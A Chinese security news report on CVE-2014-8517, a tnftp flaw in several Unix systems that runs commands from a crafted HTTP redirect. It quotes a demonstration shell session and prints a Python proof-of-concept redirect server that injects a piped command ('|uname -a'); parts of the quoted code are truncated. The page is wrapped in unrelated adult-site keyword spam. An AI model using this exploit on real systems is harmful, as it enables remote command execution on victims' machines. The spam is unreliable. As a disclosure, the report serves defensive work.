成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

FTP曝嚴重遠程執(zhí)行漏洞 影響多個版本Unix

安全 漏洞
10月28日,一份公開的郵件中曝出FTP遠程執(zhí)行命令漏洞,漏洞影響到的Unix系統(tǒng)包括:Fedora, Debian, NetBSD, FreeBSD, OpenBSD, 甚至影響到了蘋果的OS X操作系統(tǒng)的最新版本Yosemite 10.10。

10月28日,一份公開的郵件中曝出FTP遠程執(zhí)行命令漏洞,漏洞影響到的Unix系統(tǒng)包括:Fedora, Debian, NetBSD, FreeBSD, OpenBSD, 甚至影響到了蘋果的OS X操作系統(tǒng)的***版本Yosemite 10.10。

NetBSD的一位開發(fā)人員(Jared McNeill)證實了這個漏洞可以通過tnftp從WEB服務器遠程執(zhí)行惡意命令,并且此漏洞已被編號為CVE-2014-8517 :

    a20$ pwd
     /var/www/cgi-bin
     a20$ ls -l
     total 4
     -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
     -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a
     a20$ cat redirect
     #!/bin/sh
     echo 'Status: 302 Found'
     echo 'Content-Type: text/html'
     echo 'Connection: keep-alive'
     echo 'Location:
     echo
     a20$
   a20$ ftp
http://localhost/cgi-bin/redirect
   Trying ::1:80 ...
   ftp: Can't connect to `::1:80': Connection refused
   Trying 127.0.0.1:80 ...
   Requesting http://localhost/cgi-bin/redirect
   Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
   Requesting http://192.168.2.19/cgi-bin/|uname%20-a
       32      101.46 KiB/s
   32 bytes retrieved in 00:00 (78.51 KiB/s)
   NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
   ADT 2014
   Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE
   BOARD evbarm
   a20$

漏洞影響范圍及公告

Debian, Red Hat, Gentoo, Novell (SuSE Linux), DragonFly, FreeBSD, OpenBSD, and Apple等系統(tǒng)開發(fā)商已經(jīng)意識到了此漏洞的危害,其中Debian, Red Hat, Gnetoo and Novell已經(jīng)發(fā)出了漏洞公告:

FTP曝嚴重遠程執(zhí)行漏洞,影響多個版本Unix

漏洞檢測腳本(請勿用于非法用途)

And you should see the command executed.

All wrongs reversed - @stevelord
"""

import BaseHTTPServer
import sys
import socket
import urllib

hostname = socket.getfqdn() # Set this to your IP if you have no FQDN
port = 8000 # Set this to the port you want to run this on
cmd = "uname -a; echo You probably shouldnt execute random code from the Internet. Just saying."

cmd = urllib.quote(cmd)
redir = "http://" + hostname + ":" + str(port) + "/cgi-bin/|" + cmd

class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler):
 def do_GET(s):
  if cmd in s.path:
   s.send_response(200)
   s.end_headers()
  else:
   s.send_response(302)
   s.send_header("Location", redir)
   s.end_headers()

if __name__ == "__main__":
 print "redirecting to,", redir
 server_class = BaseHTTPServer.HTTPServer
 httpd = server_class((hostname, port), RedirectHandler)
 try:
  httpd.serve_forever()
  print "Started serving."
 except KeyboardInterrupt:
  pass
 httpd.server_close()
 print "\nStopped serving."

解決方案和更詳細的內(nèi)容參見:

http://seclists.org/oss-sec/2014/q4/459 http://seclists.org/oss-sec/2014/q4/464

http://seclists.org/oss-sec/2014/q4/460

參考信息來源:http://www.securityweek.com/nix-systems-affected-ftp-remote-command-execution-vulnerability

責任編輯:藍雨淚
相關(guān)推薦

2014-10-30 14:02:26

LinuxFTP漏洞

2020-10-15 12:24:46

Linux漏洞攻擊

2015-01-27 17:40:05

2014-04-29 11:18:27

2021-09-16 14:06:55

遠程代碼漏洞微軟

2024-05-07 16:38:25

2022-08-15 08:28:52

漏洞底層框架Electron

2023-08-15 19:15:20

2015-04-30 08:11:40

2015-09-23 11:42:20

2024-05-21 13:09:55

2019-02-21 10:11:49

2018-05-06 23:08:12

2023-12-08 13:18:27

2023-12-14 16:20:09

2022-12-05 15:07:29

2023-07-04 18:39:37

2024-10-12 14:36:34

2009-07-07 09:37:04

2024-09-04 14:11:12

點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 国产成人精品a视频 | 亚洲精品欧美一区二区三区 | 久久夜视频 | 久久青青 | 国产视频中文字幕 | 特一级毛片| 96av麻豆蜜桃一区二区 | 精品免费国产一区二区三区四区 | 天天干狠狠操 | 成人中文网 | 亚洲午夜精品视频 | 偷拍自拍第一页 | 国产精品69毛片高清亚洲 | 欧美综合一区二区三区 | 免费一区 | 亚洲精品久 | 成人二区三区 | 欧美中国少妇xxx性高请视频 | 亚洲精品视频在线 | 天天夜天天操 | 久草综合在线 | 日韩视频免费在线 | 欧美精品中文 | 国产精品美女www爽爽爽视频 | 久草新在线 | 国产在线精品一区二区三区 | 欧美一区二区三区在线观看视频 | 免费黄色a级毛片 | 黄色成人av | 欧美成人精品 | 欧美日韩中文字幕 | 天天干狠狠干 | 亚洲精品免费视频 | 色综合一区二区 | 中国xxxx性xxxx产国 | 日韩精品一区二区三区在线播放 | 久久久久国产一区二区三区不卡 | 久久一 | 欧美日韩亚洲国产综合 | 日韩免费视频 | 成人免费在线视频 |